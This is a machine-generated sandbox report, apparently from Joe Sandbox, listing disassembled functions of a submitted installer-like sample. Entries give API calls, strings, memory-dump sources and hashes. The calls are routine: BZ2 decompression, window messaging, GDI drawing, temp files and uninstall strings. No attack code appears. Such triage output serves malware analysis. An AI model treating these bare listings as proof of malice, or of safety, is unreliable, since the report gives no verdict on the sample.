                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D4B1
                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D4C1
                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D4D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                  • API String ID: 190572456-212574377
                                                                  • Opcode ID: cecd0a63045edb33e2202c29c90cf8f934e5a60212dd894f2f8d3c432b3cebaf
                                                                  • Instruction ID: 50a43070f27201e9cf87661d87b97551d06431c7276cd5b4b6d770057bc484c9
                                                                  • Opcode Fuzzy Hash: cecd0a63045edb33e2202c29c90cf8f934e5a60212dd894f2f8d3c432b3cebaf
                                                                  • Instruction Fuzzy Hash: 4AF0B2B0D00701DAE724DFB65CC77263A959B6431AF1084379A4D55373D67814498F2D
                                                                  Function 0042EA14 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004808CA), ref: 0042EA2D
                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA33
                                                                  • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA44
                                                                    • Part of subcall function 0042E9A4: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9BA
                                                                    • Part of subcall function 0042E9A4: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C0
                                                                    • Part of subcall function 0042E9A4: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D1
                                                                  • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA58
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                  • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                  • API String ID: 142928637-2676053874
                                                                  • Opcode ID: 527a2f903435c6b8eae660c7438eac079e405392c9f84945f8436c24f6679cfa
                                                                  • Instruction ID: b6413d45aefc5bd916056b1696ea31cacbebf8ca5ba9e8247451a7316c99a6de
                                                                  • Opcode Fuzzy Hash: 527a2f903435c6b8eae660c7438eac079e405392c9f84945f8436c24f6679cfa
                                                                  • Instruction Fuzzy Hash: C9E092A1741720EAEE10B7BA7D86FAA2558EB5072DF540037F100A51E1C7BD1C80CE9E
                                                                  Function 0044C7D4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F081), ref: 0044C7E3
                                                                  • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7F4
                                                                  • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C804
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                  • API String ID: 2238633743-1050967733
                                                                  • Opcode ID: 20d4d3efedc32434c77936c95fe9c73e42e1c540f2b792c07eccd7c7435f7152
                                                                  • Instruction ID: ee0778b55076bf214b63aaf44073c79067fceb62e20c2f516a440ec7c4faf5ed
                                                                  • Opcode Fuzzy Hash: 20d4d3efedc32434c77936c95fe9c73e42e1c540f2b792c07eccd7c7435f7152
                                                                  • Instruction Fuzzy Hash: 2FF0FE70242302CAF750ABB5FDD97563694E7E471AF14237BE401551A1D7BD4444CB8C
                                                                  Function 004786B4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
                                                                  • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
                                                                  • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                  • API String ID: 667068680-222143506
                                                                  • Opcode ID: 037c1e48967f880c8f75eb608e42e3021eac6f548ba3101ad95a3bedc305e175
                                                                  • Instruction ID: 2026d18a05cb2035c6a6e54b58e3f317de058d113ce64fa581f90165bcddcee3
                                                                  • Opcode Fuzzy Hash: 037c1e48967f880c8f75eb608e42e3021eac6f548ba3101ad95a3bedc305e175
                                                                  • Instruction Fuzzy Hash: F5C0E9F06C1701EA9640B7F15CDAD7A2558D520729720943F755EA6192D9BC4C104A6C
                                                                  Function 0041B664 Relevance: 9.1, APIs: 6, Instructions: 144windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFocus.USER32 ref: 0041B73D
                                                                  • 73A1A570.USER32(?), ref: 0041B749
                                                                  • 73A18830.GDI32(00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B77E
                                                                  • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B78A
                                                                  • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B7F2,?,00000000,0041B814,?,?), ref: 0041B7B8
                                                                  • 73A18830.GDI32(00000000,00000000,00000000,0041B7F9,?,?,00000000,00000000,0041B7F2,?,00000000,0041B814,?,?), ref: 0041B7EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: A18830$A122A26310A570Focus
                                                                  • String ID:
                                                                  • API String ID: 3906783838-0
                                                                  • Opcode ID: 7028b3360e085542d185f93eaa985fb71498e3c9d3761fe797ea6f9089370fd6
                                                                  • Instruction ID: 1a6b37f464f6ee1ac690d44aa7d10d16b676852f44f67843991ec4a9ec0a7b01
                                                                  • Opcode Fuzzy Hash: 7028b3360e085542d185f93eaa985fb71498e3c9d3761fe797ea6f9089370fd6
                                                                  • Instruction Fuzzy Hash: D9512070A002099FCF11DFA9C891AEEBBF8EF49704F10446AF514A7790D7799981CBA9
                                                                  Function 0041B934 Relevance: 9.1, APIs: 6, Instructions: 142windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFocus.USER32 ref: 0041BA0F
                                                                  • 73A1A570.USER32(?), ref: 0041BA1B
                                                                  • 73A18830.GDI32(00000000,?,00000000,00000000,0041BAE1,?,?), ref: 0041BA55
                                                                  • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAE1,?,?), ref: 0041BA61
                                                                  • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BABF,?,00000000,0041BAE1,?,?), ref: 0041BA85
                                                                  • 73A18830.GDI32(00000000,00000000,00000000,0041BAC6,?,?,00000000,00000000,0041BABF,?,00000000,0041BAE1,?,?), ref: 0041BAB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: A18830$A122A26310A570Focus
                                                                  • String ID:
                                                                  • API String ID: 3906783838-0
                                                                  • Opcode ID: 6afe2cc59a527faaede1d3d34b45dc336484c23e3dd063350b4c8de36bb0c79b
                                                                  • Instruction ID: 148f6e74122d55113d3717465da8055643ee1b9490db959cdfcac8ccc7d3b8de
                                                                  • Opcode Fuzzy Hash: 6afe2cc59a527faaede1d3d34b45dc336484c23e3dd063350b4c8de36bb0c79b
                                                                  • Instruction Fuzzy Hash: FC513975A002089FDB11DFA9C881AAEBBF9FF49700F114466F904EB750D738AD40CBA8
                                                                  Function 0041B500 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFocus.USER32 ref: 0041B576
                                                                  • 73A1A570.USER32(?,00000000,0041B650,?,?,?,?), ref: 0041B582
                                                                  • 73A24620.GDI32(?,00000068,00000000,0041B624,?,?,00000000,0041B650,?,?,?,?), ref: 0041B59E
                                                                  • 73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B624,?,?,00000000,0041B650,?,?,?,?), ref: 0041B5BB
                                                                  • 73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B624,?,?,00000000,0041B650), ref: 0041B5D2
                                                                  • 73A1A480.USER32(?,?,0041B62B,?,?), ref: 0041B61E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: E680$A24620A480A570Focus
                                                                  • String ID:
                                                                  • API String ID: 3709697839-0
                                                                  • Opcode ID: b97e33ea795034c912b2e17a9f5d54d6d1d1af920c0d7a51194e8edd97010b3d
                                                                  • Instruction ID: df8759ecd31a85a201270414174f0a8fa00d18147156f7fa6755a0b35bba35d1
                                                                  • Opcode Fuzzy Hash: b97e33ea795034c912b2e17a9f5d54d6d1d1af920c0d7a51194e8edd97010b3d
                                                                  • Instruction Fuzzy Hash: E9410831A00258AFCB10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D50CBA5
                                                                  Function 0045CE6C Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000057,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CED7
                                                                  • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045CFA4,?,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CF16
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                  • API String ID: 1452528299-1580325520
                                                                  • Opcode ID: 76cc67341227ff3c05617fb08029e3d04d7592c217e5ac47b77cb7a8c66e2160
                                                                  • Instruction ID: 04ddcdc8736abbc18e914b4e1455ed0448250d7d0c77fa2ba5441d80ccfd4ce1
                                                                  • Opcode Fuzzy Hash: 76cc67341227ff3c05617fb08029e3d04d7592c217e5ac47b77cb7a8c66e2160
                                                                  • Instruction Fuzzy Hash: C7118736204304FFDB11DA91C9C2AAEB69EDB44746F6040776D00967C3D67C9F0AE56D
                                                                  Function 0041BD84 Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0041BDCD
                                                                  • GetSystemMetrics.USER32(0000000C), ref: 0041BDD7
                                                                  • 73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDE1
                                                                  • 73A24620.GDI32(00000000,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE08
                                                                  • 73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE15
                                                                  • 73A1A480.USER32(00000000,00000000,0041BE5B,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE4E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: A24620MetricsSystem$A480A570
                                                                  • String ID:
                                                                  • API String ID: 4042297458-0
                                                                  • Opcode ID: b7d5d08e3e19f48413646ae1536af481ff140cf83ce15b3b4f218d501696187d
                                                                  • Instruction ID: 747e2eb1a3f7a7c841cace1b59abe43854f3131f67fff351bf4eed9cd228abed
                                                                  • Opcode Fuzzy Hash: b7d5d08e3e19f48413646ae1536af481ff140cf83ce15b3b4f218d501696187d
                                                                  • Instruction Fuzzy Hash: 98215974E00748AFEB10EFA9C942BEEBBB4EB48714F10842AF514B7280D7785D40CB69
                                                                  Function 0047DDA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0047DDAE
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CB69), ref: 0047DDD4
                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0047DDE4
                                                                  • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047DE05
                                                                  • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047DE19
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047DE35
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$Show
                                                                  • String ID:
                                                                  • API String ID: 3609083571-0
                                                                  • Opcode ID: 69fb56ec72bb48bf799d73a9f514c3e84a97c3b26dbd79650f0c817e19817d20
                                                                  • Instruction ID: 8d1f2698ea79badf96abf755c5a3f857121e06e6ffc739f26560ae4cefe558a1
                                                                  • Opcode Fuzzy Hash: 69fb56ec72bb48bf799d73a9f514c3e84a97c3b26dbd79650f0c817e19817d20
                                                                  • Instruction Fuzzy Hash: CA0112B5651610ABE700D768DE45F7637E8AF1C324F094266B659DF3E3C738E8408B49
                                                                  Function 0041B268 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0041A6D8: CreateBrushIndirect.GDI32 ref: 0041A743
                                                                  • UnrealizeObject.GDI32(00000000), ref: 0041B274
                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B286
                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041B2A9
                                                                  • SetBkMode.GDI32(?,00000002), ref: 0041B2B4
                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041B2CF
                                                                  • SetBkMode.GDI32(?,00000001), ref: 0041B2DA
                                                                    • Part of subcall function 0041A050: GetSysColor.USER32(?), ref: 0041A05A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                  • String ID:
                                                                  • API String ID: 3527656728-0
                                                                  • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                  • Instruction ID: 416fc8ddf3b290ca22d08e3f0d0fa9d59de125dbf6d826fc2ec32e7be4b681d8
                                                                  • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                  • Instruction Fuzzy Hash: 15F072B56015009FDF00FFAAD9C6E5F67989F043197048456B948DF197C93DD8505B3A
                                                                  Function 00455DE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F1F), ref: 00455E10
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E16
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                  • API String ID: 1646373207-3712701948
                                                                  • Opcode ID: 2a586cdd6d3b5b624cec46e44aab5337d0e4580ac2e02e9277c845893915eeed
                                                                  • Instruction ID: 94d637f012244594286cd058a6e690650624bbac00cb131118490790a059a9ff
                                                                  • Opcode Fuzzy Hash: 2a586cdd6d3b5b624cec46e44aab5337d0e4580ac2e02e9277c845893915eeed
                                                                  • Instruction Fuzzy Hash: F6416271A04649ABCF01EFA5C892DEEB7B8EF48304F504566E800F7292D6785E09CB68
                                                                  Function 00453890 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 100fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045397F
                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045398F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateFileHandle
                                                                  • String ID: -cI$.tmp$_iu
                                                                  • API String ID: 3498533004-3964432171
                                                                  • Opcode ID: 02fc6949860a742288c4963694ea4c9fb07eaa5c322dedd883b179278d380901
                                                                  • Instruction ID: 987f34639f2954820d3a171204f3ba7a53f2c28fb23a6faa943e541cb6d42ed5
                                                                  • Opcode Fuzzy Hash: 02fc6949860a742288c4963694ea4c9fb07eaa5c322dedd883b179278d380901
                                                                  • Instruction Fuzzy Hash: 293195B0A00249ABCB11EFA5C942BAEBBB4AF44309F60456AF800B73C2D6785F059758
                                                                  Function 00497268 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                  • ShowWindow.USER32(?,00000005,00000000,004974CD,?,?,00000000), ref: 0049729E
                                                                    • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                    • Part of subcall function 00407298: SetCurrentDirectoryA.KERNEL32(00000000,?,004972C6,00000000,00497499,?,?,00000005,00000000,004974CD,?,?,00000000), ref: 004072A3
                                                                    • Part of subcall function 0042D444: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4D2,?,?,?,00000001,?,00456052,00000000,004560BA), ref: 0042D479
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                  • String ID: .dat$.msg$IMsg$Uninstall
                                                                  • API String ID: 3312786188-1660910688
                                                                  • Opcode ID: fee9eccc106b75620d129768861d1a7621c8bfd9450b5e9a776089888b3099eb
